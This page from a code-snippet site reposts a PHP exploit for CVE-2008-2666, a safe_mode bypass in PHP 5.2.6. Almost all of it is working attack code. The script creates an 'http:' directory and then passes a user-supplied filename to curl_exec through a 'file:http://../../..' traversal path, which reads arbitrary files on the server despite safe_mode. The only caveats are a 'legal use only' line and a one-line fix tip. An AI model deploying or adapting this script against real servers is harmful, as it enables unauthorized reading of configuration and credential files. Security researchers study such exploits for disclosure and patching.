php 5.2.6 safe_mode bypass exploit


/ Published in: PHP
Save to your folder(s)



Copy this code and paste it in your HTML
  1. <?php
  2. /*
  3. Exploit for CVE-2008-2666:
  4. http://securityreason.com/achievement_securityalert/55
  5.  
  6. Orginal URL
  7. http://securityreason.com/achievement_exploitalert/10
  8.  
  9. safe_mode Bypass PHP 5.2.6
  10. by Maksymilian Arciemowicz http://securityreason.com
  11. cxib [at] securityreason [dot] com
  12.  
  13. How to fix?
  14. Do not use safe_mode as a main safety
  15. */
  16.  
  17. echo "<PRE><P>This is exploit from <a href=\"http://securityreason.com\">http://securityreason.com</a>Maksymilian Arciemowicz<p>Script for legal use only.<p>PHP 5.2.6 safe_mode bypass<p>More: <a href=\"http://securityreason.com/news/0/0x24\">http://securityreason.com/news/0/0x24</a><p><form name=\"form\" action=\"http://".$_SERVER["HTTP_HOST"].htmlspecialchars($_SERVER["SCRIPT_NAME"])."\" method=\"post\"><input type=\"text\" name=\"file\" size=\"50\" value=\"\"><input type=\"submit\" name=\"studiaNAuwrCZYpwrTOmanipulacja\" value=\"Show\"></form>\n";
  18.  
  19. if(!is_dir(dirname(__FILE__)."/http:")){ // can work without this requirement
  20. if(!is_writable(dirname(__FILE__))) die("<b>I can't create http:directory</b>");
  21. mkdir("http:");
  22. }
  23.  
  24. if(empty($file) and empty($_GET['file']) and empty($_POST['file']))
  25. die("\n".$karatonik);
  26.  
  27. if(!empty($_GET['file'])) $file=$_GET['file'];
  28. if(!empty($_POST['file'])) $file=$_POST['file'];
  29.  
  30.  
  31. if((curl_exec(curl_init("file:http://../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../".$file))) and !empty($file)) die("<B><br>best regards cxib from securityreason.com</B></FONT>");
  32. elseif(!emptY($file)) die("<FONT COLOR=\"RED\"><CENTER>Sorry... File<B>".htmlspecialchars($file)."</B> doesn't exists or you don't have permissions.</CENTER></FONT>");
  33. ?>

Report this snippet


Comments

RSS Icon Subscribe to comments

You need to login to post a comment.